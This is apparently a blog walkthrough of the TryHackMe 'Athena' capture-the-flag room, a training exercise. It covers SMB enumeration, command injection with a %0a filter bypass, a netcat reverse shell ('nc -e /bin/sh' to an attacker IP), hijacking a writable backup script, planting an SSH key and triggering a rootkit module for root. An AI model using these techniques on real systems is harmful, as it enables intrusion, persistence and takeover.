Athena TryHackMe Walkthrough

6 months ago 43
BOOK THIS SPACE FOR AD
ARTICLE AD

Boogsta

Hello guys, today I will be talking you through the room Athena on TryHackMe the room can be found via the link below

This room incorporates a lot of cool steps to fully root the machine. As you will see throughout this walk through it isn’t as simple as it first seems.

First off we run nmap against the target IP and we get back the result

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-07 20:53 BST
Nmap scan report for ip-10-10-231-6.eu-west-1.compute.internal (10.10.231.6)
Host is up (0.0022s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:8C:2B:5B:41:93 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Breaking this down, we have port 22 open running SSH this we can look over as usually it isn’t where we want to get initial access. There is a webserver running on port 80 which we will also take a look at and also SMB is running too on port 445. Lets have a look at the website first.

Website

The webserver is hosting a static webpage. I ran dirb against this and all it found was index.html and server status which gave me a 403 error. Now we take a look at SMB. We want to enumerate what shares there are. To do this we are going to use the tool smbclient

smbclient -L \\\\<ip>\\

This will list out the shares that are inside and hopefully give us more to go off.

We got lucky! Anonymous login is allowed and we was able to see that there is a share called “public” now we need to connect to this with the following command

smbclient \\\\<ip>\\public

Once connected, we list out the contents and find there is a note for the administrator. Lets download it and read what it says.

Nice! We now have found our hidden directory. Lets navigate to this and see what we have.

If you have done bug bounty before, this should be obvious what we have to do now, however, if not don’t worry I’ll be walking you through it here too! We have a tool that allows us to ping a web address both internally and externally. Lets have a look at the output

If we try to ping google, we get the output that looks a little something like this. If you have used the ping command before you’d be able to see this is quite similar. But what is also interesting is we could also try to append our own command to the end of our input to see if we can get command injection. Let’s load up burpsuite and try a few basic payloads

If we capture the request and throw it over to repeater we are able to try a few things. First off we try the command “| id” which seems to be getting filtered and blocked. We could try URL encoding but we also trigger “Attempt hacking!” Hacktrickz has a good article on command injection and the one that works for us is the payload %0a whoami as you can see below we see www-data is in the body of the response and we have successfully found command injection!

Now that we have command injection, we can try and get a shell on the webserver. But again if we use a basic bash shell the “Attempt hacking!” screen appears again. Looks like we need to find something else on the webserver we can use. The next go to would be python but this also throws the same issues. Finally we try netcat which works! The payload we will use is

nc -e /bin/sh 10.10.161.13 4545

Change the IP to your machine IP. Start up a netcat listener on your machine with nc -nlvp 4545 and then send the request in burp!

Now that is the web app side of things done and the fun begins. We now want to move laterally to another user. If we cat the /etc/passwd file you can see we have another user on the system called “Athena”

We can also see this in the /home directory

We don’t seem to be able to move into athena so we have to figure out how we can become this user! For this we are going to use linpeas to enumerate the machine for us. Start up a python server and transfer the linpeas.sh script over to the target machine with wget. Make sure to copy it into the /tmp directory too

As you can see I also changed the file permissions with chmod 777 so we can now run the script. After it has finished there is firstly a lot to take in but we will hone in on one specific file. In the “Interesting files owned by me” section of the output we can see that there is a file called “backup.sh”

If we list out the path the file is in we see that the file user group is athena.

The backup.sh file can also be written too so now we go and get a bash one liner payload that we can echo into the file and when backup.sh is ran by athena we will gain a shell as athena right?

After waiting around 30 seconds to a minute we get our shell!

Now we are athena we want to make this shell a little more stable. We can do this by setting up SSH. run ssh-keygen on your attacker machine. After running this we should see two files created id_rsa and id_rsa.pub in our directory.

Now in the athena shell we want to cd to the .ssh directory and copy the contents of id_rsa.pub into authorized_keys using the command

echo '<content>' >> authorized_keys

Once you’ve done this, go back to your attacker machine and login with ssh and your id_rsa key with the command

ssh -i id_rsa athena@<ip>

Perfect we now have access to SSH. Lets run sudo -l and see what we can run as sudo

I’ve never seen this before? Lets download the file and open it in Ghidra and see what we have.

Reversing the file, we can see there is a section of code that reads

__fentry__();
plVar2 = module_previous;
iVar3 = (int)*(undefined8 *)(param_1 + 0x68);
if (iVar3 == 0x39) {
give_root();
__x86_return_thunk();
return;
}

So if iVar3 is equal to the value of 0x39 we trigger the “give_root()” function. But what is 0x39? A simple google search shows us

0x39 equals to 57 so if we kill process 57 we should get root! Well, first we got to run the venom.ko file and then do the command kill -57 0

Congrats you just rooted the box!

Read Entire Article